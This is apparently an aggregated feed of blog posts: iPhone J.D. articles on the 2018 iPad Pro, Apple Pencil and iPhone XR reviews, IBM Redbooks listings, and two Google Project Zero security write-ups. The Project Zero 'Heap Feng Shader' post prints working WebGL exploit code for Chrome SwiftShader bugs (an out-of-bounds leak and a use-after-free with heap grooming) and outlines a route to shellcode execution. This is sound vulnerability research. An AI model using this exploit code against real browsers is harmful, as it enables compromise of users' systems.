Easier to hold.  The second generation Pencil has a matte finish, unlike the glossy finish of the original Pencil.  That, combined with the flat edge, should make the Pencil easier to hold.  I'll have to try it myself to confirm that this is true, but the initial reports from folks who got a chance to try it for a few minutes yesterday seem positive.

Tap to wake.  If the iPad display is off, you can tap the screen with the new Pencil to wake the device and launch the Notes app, ready for you to jot a note.

Free engraving.  Now that the Pencil has a flat side, there is a surface suitable for putting some words.  All new Pencils have the Apple logo with the word "Pencil" next to it, and you can add up to 15 letters in ALL CAPS next to that.

Old favorites.  And of course, the second generation Apple Pencil keeps what was wonderful about the original model.  Apple says that it is highly responsive with virtually no lag, perfectly precise, and pressure sensitive.  And you can rest your hand on the display without your the contact between your palm and the screen creating marks.

I've seen reports that the original Apple Pencil won't work with the new iPad Pro; it only works with the second generation Apple Pencil.  But given the new features, that's what I will want to use.  This new Pencil looks great.  I still wish that Apple would allow third-party hardware manufacturers to create their own styluses which have the same precision and responsiveness as an Apple Pencil, because that way we would see even more innovation.  Nevertheless, this second generation Pencil seems to address all of my current wishes and adds many other cool features which did not occur to me.

Face ID

As noted, the new iPad Pro does not have a Home Button or Touch ID.  Instead, just like the newest iPhones, it supports Face ID.  Unlike the iPhone, Face ID works no matter which way you have the new iPad turned.

Because it has a Face ID camera, the new iPad also supports portrait mode pictures (for the front-facing camera only) and Animoji and Memoji.

Flat edge

In addition to the reduced bezels, there is another design change:  flat edges around all four sides.  The edge reminds me of the iPhone 4 and iPhone 5, which were designs that I really liked; for an iPhone, the flat edge made it easier to grip the device.  I'll need to try it out myself to see if I like this better or not, but it is a noticeable difference.

Liquid Retina display

Apple says that the display is improved, using Liquid Retina technology, which Apple also uses in the new iPhone XR.  It features more accurate colors.  I believe that the brightness is the same as the prior iPad Pro.

More powerful

Every new iPad is faster than the model before it, and the new iPad Pro features the A12 Bionic chip.  Apple says that it is much faster than the previous generation and faster than 92% of all of the portable PCs sold in the last 12 months.  Apple also says graphics are about as fast as an Xbox One S, which isn't quite a powerful as the high-end Xbox One X, but the fact that an iPad is even in the same league as any currently shipping game console is just bonkers.  Apple showed off a demo yesterday of a basketball game (NBA 2K) and the graphics were stunning.

I don't know if I will ever take advantage of all of this power, but I look forward to trying, and it is always better when an iPad or iPhone is more responsive.


To the surprise of many, Apple has removed the Lightning port from the iPad, replacing it with an industry-standard USB-C port.  The new iPad Pro supports USB 3.1 Gen 2 high-bandwidth data transfers, which means much faster data transfer over USB-C than the previous models with a Lightning connector.  For example, this increased speed means that an iPad Pro can now support an external 5K display. 

USB-C, in theory, allows for faster charging because it supports more power, but I'm not yet sure if Apple supports this.  Apple did say that thanks to USB-C you can now send power out of an iPad, so you could use a USB-C to Lightning cable to use your iPad Pro to charge your iPhone.

Also, because USB-C is an industry standard, this means that there is a potential that we will see even more accessories.  At this point, I'm not sure that the software will support everything that is theoretically possible.  For example, there are USB-C external flash drives and even hard drives, and I don't think that iOS 12.1 support this, but it could in a future update.

The downside of any change like this is that you need to get new accessories.  I currently use a Lightning-to-SD card dongle so that I can take an SD card out of my SLR camera and load the pictures directly onto my iPad, something that I often do when I take a lot of pictures on vacation and I am away from my computer.  I'll have to purchase a USB-C-to-SD dongle to do the same thing.  I also currently use a Lightning-to-HDMI and Lightning-to-VGA dongle to connect a projector to my iPad Pro when I am giving presentations.  Apple isn't currently selling USB-C versions of these dongles, but it may be that I can just purchase an inexpensive one on Amazon.  (I'm not yet sure about that, though; it may be that a DisplayPort connector is required.)  Or perhaps the USB-C Digital AV Multiport Adapter which Apple currently sells for the Mac will work with the new iPad Pro too.  I look forward to hearing more about USB-C compatibility for video-out.

Suffice it to say that at this point, I have as many questions about USB-C as I do answers.  Nevertheless, Apple apparently saw some big advantages to justify giving up using its proprietary Lightning connector, so I'm very optimistic about this change.

Smart connector

Apple moved the Smart Connector, which used to be on the long edge to the back on the short edge.  Apple uses the new Smart Connector with the new Smart Keyboard Folio, which is a case covering the front and back of the iPad with a keyboard built-in.  You can double-press the space bar to unlock the iPad using Face ID, and you can adjust the tilt of the iPad to two orientations.

Color and capacity

The new iPad comes in two colors:  silver and space gray.

You can get models with 64GB, 256GB, 512GB, or 1TB.  I ordered the 256GB model, which I think will be enough for my needs now and in the future even though I carry around a large number of documents and videos on my iPad.

No headphone port

The new iPad Pro doesn't have a headphone port.  You can either use Bluetooth headphones like the AirPods, or you can get a USB-C-to-3.5mm headphone dongle for $9.


These new iPads have lots of new features, but they come at a cost.  Earlier this year, Apple introduced the Sixth Generation iPad, a very nice device which supports the first generation Pencil.  Although I don't recommend the 32GB model which costs $329 to any attorneys because you are unlikely to have enough space for all of your documents, you can get the 128GB model for $429.

The new iPad Pro has a 64GB model ($799 for 11" or $999 for 12.9").  That's not enough space for my needs as a litigator with tons of documents from dozens of cases on my iPad, but for some attorneys that might be enough.  The better option is the 256GB model ($949 for 11" or $1149 for 12.9").

Thus, you are paying twice as much, or more, for the iPad Pro.  But you get a lot more:  larger screen, support for the second generation Apple Pencil, a much faster device, and a much nicer screen.  You also get Face ID and USB-C.  You also get a better camera, but I didn't even list that feature above because I don't consider the camera on the back of an iPad important for most attorneys.

Note also that the second generation Apple Pencil is slightly more expensive at $129 versus $99 for the first generation Pencil.


Apple loves to tout that the iPad Pro more powerful than many computers, and that is true.  Of course, it is also more expensive, so you pay for that power.  For me, the larger screen size of the iPad Pro easily makes it more than twice as useful as the Sixth Generation iPad.  Add the faster processor and the support for the second generation Apple Pencil, and the choice is clear.  If you want to get the most out of an iPad in your law practice, the iPad Pro is the way to go.

Having said that, if you believe that you have more modest needs, the Sixth Generation iPad introduced earlier this year is much cheaper, and it also supports the incredibly useful Apple Pencil, albeit just the first generation model.

The new iPad Pro will be available starting November 7, 2018.  I ordered the 12.9" space gray model with 256GB along with the new Apple Pencil.  After I have had a chance to use it for a while, I'll write a formal review.  But for now, I'm very excited because this new iPad Pro looks to be a major leap forward for the iPad.

Categories: iPhone Web Sites

Big day: new iPads announced, iOS 12.1 available, and more

iPhone J.D. - Mon, 10/29/2018 - 22:37

Today will be a big day for iPhone and iPad users.  First, Apple is holding its October special event at 10 Eastern in Brooklyn, NY.  Apple isn't saying what will be announced, but virtually everyone expects to see a new iPad Pro with smaller bezels, no home button, and Face ID — the iPad version of the iPhone X.  There are also rumors that Apple will unveil a second generation of the Apple Pencil with support for touch gestures on the Pencil.  I would love the ability to tap or do something else on the Pencil to switch between a pencil and an eraser.  And I'm sure that Apple has even more to unveil this morning.  You can watch the presentation live by visiting this page on Apple's website.

Second, Apple announced yesterday in a press release that Apple will release iOS 12.1 today.  This .1 update will include new features, including some which were previously announced but not quite ready when iOS 12 was released last month:  (1) Group FaceTime, which allows you to have private, encrypted FaceTime video conferences with up to 32 people at one time with automatic selection and focus on the person speaking; (2) the new emoji which Apple first previewed this past July; (3) for iPhone XS owners, the ability to control the bokeh effect in Portrait mode by adjusting the depth effect while you are taking the picture instead of just after the picture is taken; and (4) dual SIM support for the iPhone XS and iPhone XR.  Those are the major new features, but there are sure to be many other improvements in there as well.

Today should be an interesting day!

Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 10/26/2018 - 01:26

Do you pay much attention to the News app on iOS?  In the beginning I ignored it, but then I saw that it was doing a pretty good job of telling me about the important headlines of the day, and I noticed that the articles it recommended were of pretty good quality.  Yesterday, Jack Nicas of the New York Times reported that there is a reason for that.  Unlike services like Facebook which use algorithms to select headlines, Apple uses a team of humans, led by Lauren Kern, an experienced journalist who was previously the executive editor of the New York Times Magazine.  The article explains how the team selects the top stories from reputable sources and finds articles which do a good job reporting on each issue.  By the way, if you have any interest in reading iPhone J.D. in the News app, you can search for the iPhone J.D. channel and make it one of your favorites.  And now, the news of note from the past week:

  • In a post on the LitSoftware Blog, Houston attorney Michael Beckelman of Wilson Elser explains how he uses TrialPad, TranscriptPad and DocReviewPad on his iPad at trial, in depositions, and in mediation.
  • The latest episode of the Mac Power Users podcast by attorneys David Sparks and Katie Floyd recommends 30 products under $30, many of which are for the iPhone.  It's a great episode.
  • Thomas Brewster of Forbes reports that the GrayKey device used by many government and law enforcement agencies to hack into a seized iPhone no longer works in iOS 12.
  • Rene Ritchie of iMore posted a comprehensive review of the iPhone XR, including a long video review.
  • Joanna Stern of the Wall Street Journal also wrote a good review, but I especially like the video she prepared at an Apple orchid.
  • Tony Romm of the Washington Post reports on a presentation that Apple CEO Tim Cook gave in Brussels about the importance of privacy among tech companies.
  • You can now get the 1Password password manager app for free if you are running for office, ensuring that elections run fairly, or are protecting people's rights, through the new 1Password for Democracy program.  That description would seem to apply to many public interest attorneys.
  • If you want to use AirPlay 2 to have music or other audio come out of multiple speakers in your house but you don't need Siri and the other features of the HomePod, Zac Hall of 9to5Mac posted a favorable review of the Libratone Zipp, a portable Bluetooth speaker that works with AirPlay 2.
  • In an article for TidBITS, Julio Ojeda-Zapata sings the praises of using Overcast and the Apple Podcasts app on an Apple Watch Series 4.  I'm a big fan too.  When I'm doing errands around the house, I like being able to listen to a podcast using Overcast no matter which room I'm in without having to carry around my iPhone.  When I'm walking outside, I will often have my iPhone in a shirt pocket, but sometimes it will think that I have touched the screen and it will pause the podcast as if I tapped the pause button; I have no such problems when I just connect my AirPods directly to my Apple Watch Series 4.  Thanks to the new Apple Watch, I spend some time listening to a podcast on my watch almost every day.
  • Ben Lovejoy of 9to5Mac reports on an interview of Apple's Jony Ive about the Apple Watch that was in the Financial Times.
  • It won't surprise you that I vastly prefer iPhones to Android phones.  But there is one part of Android that I think gives Apple a run for its money — the computational photography used in the camera.  Vlad Savov of The Verge shows off Google's upcoming Night Sight feature for Pixel phones, and it is astounding what Google is able to accomplish with very little light.  I'm sure that lots of smart folks at Apple are paying attention, and I look forward to seeing something like this on the iPhone in the future.
  • Last week, I ended my Friday post with some of the amazing art that Apple used on the invitations for its upcoming October 30, 2018 event in Brooklyn, NY.  Juli Clover of MacRumors posted a link to an Imgur album which contains all 350 of these unique takes on the Apple logo.  I really enjoyed browsing through all of them.
  • And finally, if you visit the Visitor Center at the new Apple Park campus in Cupertino, CA, you can buy Apple-branded T-shirts that are not sold anywhere else.  Michael Steeber of 9to5Mac reports that there are three new T-shirts being sold by Apple which hearken back to six-color Apple designs from the 1980s.  These hit me in a soft spot because that is when I started using Apple products; I used an Apple ][+ in the computer lab of my high school, and then I purchased a Mac SE as I started my sophomore year in college.  I'm glad that Apple brought back the classic logo, and I'm sure that means that Apple will soon bring back its Apple Gift Catalog with items like this:

Categories: iPhone Web Sites

Heap Feng Shader: Exploiting SwiftShader in Chrome

Google Project Zero - Wed, 10/24/2018 - 14:17
Posted by Mark Brand, Google Project Zero
On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested to see the performance difference, or just to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration using the --disable-gpu command line flag.
SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process; the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported that were recently fixed by Chrome.
It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fallback to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog-post we’ll be assuming that the GPU process is already in the fallback software rendering mode.
Previous precision problems
So; we previously discussed an information leak issue resulting from some precision issues in the SwiftShader code - so we’ll start here, with a useful leaking primitive from this issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read()is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation will happen at the first line marked in bold, and the out-of-bounds access happens at the second).
function issue_1584(gl) {  const src_width  = 0x2000;  const src_height = 0x16c4;
 // we use a texture for the source, since this will be allocated directly  // when we call glTexImage2D.
 this.src_fb = gl.createFramebuffer();  gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);
 let src_data = new Uint8Array(src_width * src_height * 4);  for (var i = 0; i < src_data.length; ++i) {    src_data[i] = 0x41;  }
 let src_tex = gl.createTexture();  gl.bindTexture(gl.TEXTURE_2D, src_tex);  gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);  gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0);
 this.read = function() {    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);
   const dst_width  = 0x2000;    const dst_height = 0x1fc4;
   dst_fb = gl.createFramebuffer();    gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);
   let dst_rb = gl.createRenderbuffer();    gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);    gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);    gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);
   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);
   // trigger    gl.blitFramebuffer(0, 0, src_width, src_height,                       0, 0, dst_width, dst_height,                       gl.COLOR_BUFFER_BIT, gl.NEAREST);
   // copy the out of bounds data back to javascript    var leak_data = new Uint8Array(dst_width * 8);    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);    gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);    return leak_data.buffer;  }
 return this;}
This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.
And a second bug
Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object caused by a reference count overflow. This object is quite a nice object from an exploitation perspective, since from javascript we can read and write from the data it stores, so it seems like the nicest exploitation approach would be to replace this object with a corrupted version; however, as it’s a c++ object we’ll need to break ASLR in the GPU process to achieve this. If you’re reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.
So - a stock-take. We’ve just free’d an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!
This was actually the most frustrating part of the exploit. Due to the multiple levels of validation/duplication/copying that occur when OpenGL commands are passed from WebGL to the GPU process (Initial WebGL validation (in renderer), GPU command buffer interface, ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you’d expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.
However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.
The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The shader source code (the first bold section) will cause 4 allocations of size 0xf0 when the program object is linked, and the second bold section is where the original object will be free’d and replaced by a shader uniform object.
function issue_1585(gl, fake) {  let vertex_shader = gl.createShader(gl.VERTEX_SHADER);  gl.shaderSource(vertex_shader, `    attribute vec4 position;    uniform int block0[60];    uniform int block1[60];    uniform int block2[60];    uniform int block3[60];
   void main() {      gl_Position = position;      gl_Position.x += float(block0[0]);      gl_Position.x += float(block1[0]);      gl_Position.x += float(block2[0]);      gl_Position.x += float(block3[0]);    }`);  gl.compileShader(vertex_shader);
 let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);  gl.shaderSource(fragment_shader, `    void main() {      gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);    }`);  gl.compileShader(fragment_shader);
 this.program = gl.createProgram();  gl.attachShader(this.program, vertex_shader);  gl.attachShader(this.program, fragment_shader);
 const uaf_width = 8190;  const uaf_height = 8190;
 this.fb = gl.createFramebuffer();  uaf_rb = gl.createRenderbuffer();
 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);  gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);  gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);  gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, uaf_rb);
 let tex = gl.createTexture();  gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);  // trigger  for (i = 2; i < 0x10; ++i) {    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);  }
 function unroll(gl) {    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);    // snip ...    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);  }
 for (i = 0x10; i < 0x100000000; i += 0x10) {    unroll(gl);  }
 // the egl::ImageImplementation for the rendertarget of uaf_rb is now 0, so  // this call will free it, leaving a dangling reference  gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 256, 256, 0);
 // replace the allocation with our shader uniform.  gl.linkProgram(this.program);  gl.useProgram(this.program);
 function wait(ms) {    var start = Date.now(),    now = start;    while (now - start < ms) {      now = Date.now();    }  }
 function read(uaf, index) {    wait(200);    var read_data = new Int32Array(60);    for (var i = 0; i < 60; ++i) {      read_data[i] = gl.getUniform(uaf.program, gl.getUniformLocation(uaf.program, 'block' + index.toString() + '[' + i.toString() + ']'));    }    return read_data.buffer;  }
 function write(uaf, index, buffer) {    gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()), new Int32Array(buffer));    wait(200);  }
 this.read = function() {    return read(this, this.index);  }
 this.write = function(buffer) {    return write(this, this.index, buffer);  }
 for (var i = 0; i < 4; ++i) {    write(this, i, fake.buffer);  }
 gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT, new Uint32Array(2 * 2 * 16));  for (var i = 0; i < 4; ++i) {    data = new DataView(read(this, i));    for (var j = 0; j < 0xf0; ++j) {      if (fake.getUint8(j) != data.getUint8(j)) {        log('uaf block index is ' + i.toString());        this.index = i;        return this;      }    }  }}
At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.
Now, it should be fairly trivial to get arbitrary code execution from this point, although it’s often a pain to get your ROP chain to line up nicely when you have to replace a c++ object, this is a very tractable problem. It turns out, though, that there’s another trick that will make this exploit more elegant.
SwiftShader uses JIT compilation of shaders to get as high performance as possible - and that JIT compiler uses another c++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can create a fake object that uses our egl::ImageImplementation object as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?
We can - so by creating a fake vtable such that:egl::ImageImplementation::lockInternal -> egl::ImageImplementation::lockInternalegl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntryegl::ImageImplementation::release -> shellcode
When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.
ConclusionsIt’s interesting that we can find directly javascript-accessible attack surface in some unlikely places in a modern browser codebase when we look at things sideways - avoiding the perhaps more obvious and highly contested areas such as the main javascript JIT engine.
In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.
Categories: Security

iPhone XR initial reviews -- the best iPhone for most attorneys

iPhone J.D. - Wed, 10/24/2018 - 01:29

Starting this Friday, you can purchase an iPhone XR.  If you have an older iPhone and you are ready to upgrade to the edge-to-edge screen of the iPhone X-type devices, that means that you now have a choice.  Do you get the iPhone XS, the iPhone XS Max, or the iPhone XR?

Apple gave review units of the iPhone XR to select members of the press, and the initial reviews were published yesterday.  Interestingly, there is largely a consensus:  the iPhone XR is the right phone for most folks who are ready to upgrade.  Although I haven't tried to iPhone XR myself, based on what I am reading, I think that this conclusion will also hold true for most attorneys. 

Save $250 — make that $350 — with the iPhone XR

One of the most helpful reviews comes from John Gruber of Daring Fireball.  He points out that the price difference is even bigger than what you might expect.  I had been thinking of the iPhone XR as being a $250 discount over the iPhone XS (and $350 less than the iPhone XS Max) because that is the price difference for the entry-level 64 GB models.  However, while 64 GB will be enough for many folks, if you want the ability to carry around tons of documents, pictures, and videos, it is nice to have more than that.  In the iPhone XS line, the next step up is $150 more for the 256 GB model.  But for the iPhone XR, the next step up is only $50 more for the 128 GB model.  128 GB is a perfect size for almost any attorney today, and $50 is a small price increase for double the capacity.  As much as I use my iPhone, I only have about 140 GB (of my 256 GB model) used right now, so 128 GB seems like a very reasonable number for most attorneys.

Thus, for most attorneys, the real choice will be between the $1,150 iPhone XS 256 GB versus $800 for the iPhone XR 128 GB model.  That's a $350 difference.

More battery life with the iPhone XR

Another reason to go for the iPhone XR over the iPhone XS is battery life.  The iPhone XR seems to have the best battery life of any iPhone ever sold, with performance similar to plus-size iPhones like the iPhone XS Max.  Attorney Nilay Patel of The Verge got 13 hours of battery life under normal use conditions.  That's very impressive, and is around an hour more than the iPhone XS.


If you don't plan to use a case with your iPhone, or if you plan to use a clear case, then another advantage of the iPhone XR is that it can be more colorful, coming in blue, white, yellow, coral, and red.  If you want silver or gold, you need to go with the iPhone XS.  Both models come in black.

The tradeoffs

So you save $350 and get more battery life.  Why isn't the iPhone XR the best iPhone for everyone?  There are only a few downsides, and if these don't matter to you, then the iPhone XR is your best bet.

Screen size.  Most obviously, if you want the very largest iPhone screen, then you will want to go with the iPhone XS Max, which Apple says has a 6.5" screen, versus 6.1" for the iPhone XR and 5.8" for the iPhone XS.  John Gruber points out in his review that the actual measurements are 6.46", 6.06" and 5.85", so the iPhone XR is actually closer to the iPhone XS size than the iPhone XS Max size.

For the rest of these tradeoffs, I'll focus on the iPhone XR versus the iPhone XS.

Telephoto camera.  I think that this is the biggest thing you miss with the iPhone XR.  I didn't have an iPhone with two lenses, one of which is a telephoto lens, before I started using the iPhone X last year.  Now that I am used to this feature, I would never want to give it up.  I use the telephoto lens on a significant number of the photos and videos that I take, and it results in a much better picture when people or objects are farther away.  I get much better pictures of my kids and other family members thanks to the telephoto lens, and because I love taking pictures, this is important to me.  If you also like taking pictures, this is a major difference.

If you like taking portrait mode pictures, you also get better results with the iPhone XS, but most of the reviewers seemed to find that the difference was typically pretty minor.

While this is the #1 reason that I know that the iPhone XS is the best iPhone for me, it is just as true that if a telephoto lens doesn't matter to you, then the iPhone XR will almost certainly be the best phone for you.  The rest of the tradeoffs listed below just are not as important, in my mind.

Screen quality.  I love the colors and deep blacks on the OLED screen of the iPhone XS.  But to my surprise, the consensus among the reviewers seems to be that the LED screen of the iPhone XR is almost as good, and is close enough that it probably won't make a difference to most people.  Unless you are comparing them side-by-side, you are unlikely to notice the difference.  As Raymond Wang of Mashable says in his review:  "The bottom line is: The iPhone XR’s screen looks terrific and unless you’re comparing it to the iPhone XS, you’re not gonna find much to dislike.  Sure, you’re giving up deeper blacks for a very dark gray, and the XR’s screen isn’t HDR-ready like on the XS, but neither of these are deal breakers."  Similarly, Rene Ritchie of iMore says that while you will notice the nicer screen on the iPhone XS if you are using virtual reality apps, "[f]or everything else and everyone else, you probably won't notice a difference.  It looks terrific and is yet another example of the overall experience being far more important than any one spec read off any one sheet."

Larger bezels.  The iPhone XR also has larger bezels on the sides than the iPhone XS.  Because the edge-to-edge screen is such a key feature of an iPhone X-class device, I thought that the reviewers would be universally bothered by this.  And some were.  For example, Nilay Patel wrote:  "But the bezel... well, you’re going to notice that bezel every time you see an iPhone X or XS anywhere near an XR.  It’s very large, and it definitely makes the iPhone XR seem less premium than the iPhone XS."  On the other hand, Matthew Panzarino of TechCrunch said the larger bezels are just "slightly less elegant" and "not a big deal."  John Gruber says:  "People who use an iPhone case — which is to say the vast majority of iPhone owners — may not even notice the larger bezel.  And even without a case it’s not a problem, per se, and is really only evident when compared side-by-side."  And Raymond Wong said:  "They were larger than I remembered from my hands-on with them back in September, but they didn’t bother me at all. Almost all the time, you’re looking at the screen, not the bezels around it.  At the same time, some people are bound to find them downright distasteful."

3D Touch.  I really like 3D Touch on my iPhone XS.  For example, I like being able to push on the app icon for the Shortcuts app to see a menu of my top four shortcuts so that I can tap one to launch it.  But if I somehow lost that feature, it wouldn't be a major issue for me.  The iPhone XR doesn't have 3D Touch, although there are some circumstances in which you can hold your finger on the screen for a little bit and the iPhone will trigger a similar Haptic Touch feature.  The reviewers generally thought that it wasn't a big loss to not have 3D Touch, and that sounds about right to me.

Etc. There are some other smaller differences, but the reviewers seemed to indicate that they were less important, and I agree.  The iPhone XR is slightly less waterproof.  If you are in an area that supports Gigabit-class LTE, you can take advantage of those faster speeds on an iPhone XS but not on an iPhone XR.  And while the front glass is the same on the iPhone XR and the iPhone XS, the iPhone XR has a less durable glass on the back.


After reading the numerous hands-on reviews quoted above and many more, I'm still happy that I have the iPhone XS.  The telephoto lens alone makes that iPhone worth it to me, and then all of the other minor differences add up to make me happier with that model.

Having said that, I think that the iPhone XR with 128 GB is the best iPhone for most attorneys.  If you like a larger screen, get the iPhone XS Max.  If you like taking pictures with your device, you'll really appreciate the telephoto lens on the iPhone XS.  But if those two don't matter to you, I don't think that the additional differences are worth the $350 you can save and the extra battery life that you get by choosing the iPhone XR instead of the iPhone XS.

Categories: iPhone Web Sites

IBM z14 ZR1 Technical Guide

IBM Redbooks Site - Mon, 10/22/2018 - 09:30
Redbook, published: Mon, 22 Oct 2018

This IBM® Redbooks® publication describes the new member of the IBM Z® family, IBM z14™ Model ZR1 (Machine Type 3907).

Categories: Technology

IBM z14 (3906) Technical Guide

IBM Redbooks Site - Mon, 10/22/2018 - 09:30
Redbook, published: Mon, 22 Oct 2018

This IBM® Redbooks® publication describes the new member of the IBM Z® family, IBM z14™.

Categories: Technology

Using Apple GiveBack to trade in an Apple Watch or other old device

iPhone J.D. - Mon, 10/22/2018 - 01:05
I recently purchased an Apple Watch Series 4, which meant that I had an Apple Watch Series 2 that I was no longer using, and there is nobody in my family that would have a need for that device anytime... Jeff Richardson
Categories: iPhone Web Sites

Best practices and Getting Started Guide for Oracle on IBM LinuxONE

IBM Redbooks Site - Fri, 10/19/2018 - 09:30
Draft Redpaper, last updated: Fri, 19 Oct 2018

This IBM Redpaper publication is focused on best practices on installing and getting Oracle DB, zVM and Linux up and running on IBM LinuxONE

Categories: Technology

In the news

iPhone J.D. - Fri, 10/19/2018 - 01:44
Apple announced yesterday that it will have a "Special Event" in Brooklyn, New York on Tuesday, October 30 at 10am EDT. Presumably, this is when Apple will announce new versions of the iPad Pro, as well as other products. The... Jeff Richardson
Categories: iPhone Web Sites


Google Project Zero - Thu, 10/18/2018 - 18:27
Posted by Ian Beer, Google Project Zero
This blog post revisits an old bug found by Pangu Team and combines it with a new, albeit very similar issue I recently found to try to build a "perfect" exploit for iOS 7.1.2.
State of the artAn idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.
So let's turn back the clock to 2014...
Pangu 7On June 23 2014 @PanguTeam released the Pangu 7 jailbreak for iOS 7.1-7.1.x. They exploited a lot of bugs. The issue we're interested in is CVE-2014-4461 which Apple described as: A validation issue ... in the handling of certain metadata fields of IOSharedDataQueue objects. This issue was addressed through relocation of the metadata.
(Note that this kernel bug wasn't actually fixed in iOS 8 and Pangu reused it for Pangu 8...)
Queuerious...Looking at the iOS 8-era release notes you'll see that Pangu and I had found some bugs in similar areas:
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.
CVE-2014-4418 : Ian Beer of Google Project Zero
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.
CVE-2014-4388 : @PanguTeam
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments.
CVE-2014-4389 : Ian Beer of Google Project Zero
IODataQueueI had looked at the IOKit class IODataQueue, which the header file IODataQueue.h tells us "is designed to allow kernel code to queue data to a user process." It does this by creating a lock-free queue data-structure in shared memory.
IODataQueue was quite simple, there were only two fields: dataQueue and notifyMsg:
